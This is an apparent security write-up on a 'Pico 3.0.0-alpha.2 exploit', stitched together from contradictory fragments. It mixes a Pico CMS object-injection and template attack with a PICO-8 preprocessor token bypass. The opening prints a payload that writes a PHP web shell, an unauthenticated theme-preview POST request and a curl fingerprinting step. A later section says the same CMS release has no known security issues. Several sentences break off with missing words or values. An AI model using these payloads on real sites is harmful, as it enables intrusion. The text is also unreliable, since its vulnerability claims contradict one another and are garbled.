Pico 3.0.0-alpha.2 Exploit May 2026

To successfully exploit this, the target must meet three conditions (which are the default settings for the alpha release):

A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.

!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"

Once shell.php is written, the attacker has permanent access.

In a secure Pico installation, Twig templates are sandboxed to prevent _self.env.registerUndefinedFilterCallback("exec") style attacks. However, in alpha.2, the allowed_functions blacklist was incomplete.

The Exploit Payload: An attacker submits a crafted HTTP POST request to the theme preview endpoint (which does not require authentication in alpha builds):

POST /?action=preview_theme HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded

theme_template=shell&content=map('system')

Why this works:

The Pico 3.0.0-alpha.2 exploit serves as a stark reminder: caching layers are not security layers. The elegance of flat-file CMS architectures does not immunize them from object injection vulnerabilities.

If you are an early adopter who tested alpha.2 on a live site, assume you are compromised. Rotate your secrets, scan your files, and upgrade immediately. For the rest of us, this is a case study in why you never, ever trust user input—even when it comes from a "harmless" HTTP header.


Stay secure, stay updated.


This write-up describes a preprocessor bypass exploit identified in Pico 3.0.0-alpha.2, specifically within the context of the PICO-8 fantasy console's scripting environment.

Vulnerability Overview

The vulnerability resides in the PICO-8 preprocessor, which handles syntax extensions (like +=, shorthand if, and ?). Due to how the preprocessor handles multiline strings, an attacker can craft code that "escapes" a string after the preprocessing phase, allowing for arbitrary code execution while significantly reducing token costs for the script.

Vulnerability Type: Preprocessor Bypass / Logic Flaw
Affected Version: Pico 3.0.0-alpha.2
Impact: Arbitrary code execution and token limit bypass.

Exploit Mechanism

The exploit leverages a discrepancy in how the preprocessor treats multiline strings compared to how the final Lua interpreter executes them.

Initial State (Pre-Patch): The malicious code is placed inside a multiline string. To the preprocessor, this counts as a single token.

The Flaw: The preprocessor is "non-syntax-aware." By using specific character sequences, the attacker tricks the preprocessor into terminating the string early or failing to recognize it as a string during its "patching" phase.

Final State (Post-Patch): After the preprocessor finishes its pass, the code that was supposedly inside a string is now treated as regular, executable code by the PICO-8 engine.

Proof of Concept (PoC)

According to community research on Google Groups, the exploit allows running any code that fits on one line and avoids specific PICO-8 shorthand (like += or ?).

Token Cost: Only 8 tokens (vs. the hundreds a complex script might usually cost).

Sample Trigger:

-- The preprocessor sees a string, but the patched version executes:
[=[ exploit_code_here ]=]

(Note: The exact character sequence depends on the specific preprocessor "weirdness" mentioned in the alpha.2 release notes.)

Impact & Remediation

Security Risk: In a shared environment (like a BBS or education platform), this could lead to unintended script behavior or "impossible" cartridges that exceed standard hardware limits.

Status: Development of the original Pico project has largely ceased. While Pico 3.0.0-alpha.2 was released as a fix for certain fatal errors (such as unparenthesized #608), it introduced or retained these preprocessor quirks.

Recommendation: Users are advised to migrate to more actively maintained flat-file systems or engines like Grav CMS or HTMLy if using Pico as a web CMS. For PICO-8 developers, avoid using unofficial alpha builds for production cartridges.

The "Pico 3.0.0-alpha.2 Exploit" primarily refers to a preprocessor vulnerability in the PICO-8 fantasy console. This exploit targets the way the system's preprocessor handles code, allowing users to execute arbitrary code while bypassing standard token cost limits.

Core Mechanism

The exploit leverages "finicky" behavior in the PICO-8 preprocessor. Specifically:

Token Manipulation: Users can place code within a multiline string, which only costs 1 token. After the preprocessor "patches" or processes the code, it is no longer treated as a string, and the system executes it as regular code.

Impact: This allows for the execution of any single-line code at a cost of only 8 tokens, even if the code would naturally exceed that limit.

Limitations: The exploit does not support PICO-8 preprocessor-based syntax extensions like +=, shorthand if statements, or the ? print shortcut.

Contextual Distinctions

It is important to distinguish this PICO-8 exploit from other software with similar versioning:

PicoCMS: The flat-file CMS Pico v3.0.0-alpha.2 is actually a fix version. It was released to resolve "PHP Fatal error" issues (specifically unparenthesized expressions) and support modern PHP versions like 8.2. Maintainers state it has no known security issues.

Picomatch: A separate library, picomatch, had a vulnerability (CVE-2026-33672) involving "method injection" in POSIX character classes, which was fixed in its own version 3.0.2 (not alpha.2).

Pico-static-server: This Node.js package has a known Directory Traversal vulnerability in version 3.0.0, allowing unauthorized access to sensitive files.

Summary of the PICO-8 Exploit

Type: Preprocessor / Token Bypassing
Platform: PICO-8 Fantasy Console
Exploit Cost:
Vulnerability Cause: Non-syntax-aware preprocessor behavior

The primary feature of the Pico 3.0.0-alpha.2 exploit is a token-saving bypass in the platform's preprocessor. Key characteristics of this exploit include:

Arbitrary Code Execution: It allows users to run any single-line code that avoids specific PICO-8 syntax extensions (like or shorthand ).

Token Optimization: It reduces the cost of running that code to only , significantly lower than standard implementations.

Preprocessor Manipulation: The vulnerability stems from how the PICO-8 preprocessor handles multiline strings, allowing code to be treated as a string before a patch and then executed as regular code afterward.

In the context of , the 3.0.0-alpha.2 version was actually a security release intended to fix compatibility issues (such as unparenthesized expressions in PHP 8.0+) rather than a known exploit itself. Other "Pico" software versions have different vulnerabilities, such as a directory traversal in pico-static-server.

As of this writing, Pico 3.0.0-alpha.2 has not received an official CVE ID, primarily because the Pico CMS team explicitly warns that alpha versions are "not for production use." However, security researchers have cataloged the exploit under third-party advisories.

The primary attack vectors identified in this version include:

The most dangerous exploit chains the first two vulnerabilities together, achieving Remote Code Execution (RCE) without authentication.

The attacker first checks if the target is running the vulnerable version by requesting a non-existent page and looking for the PicoCMS-3.0.0-alpha.2 header.

curl -I https://victim.com/pico/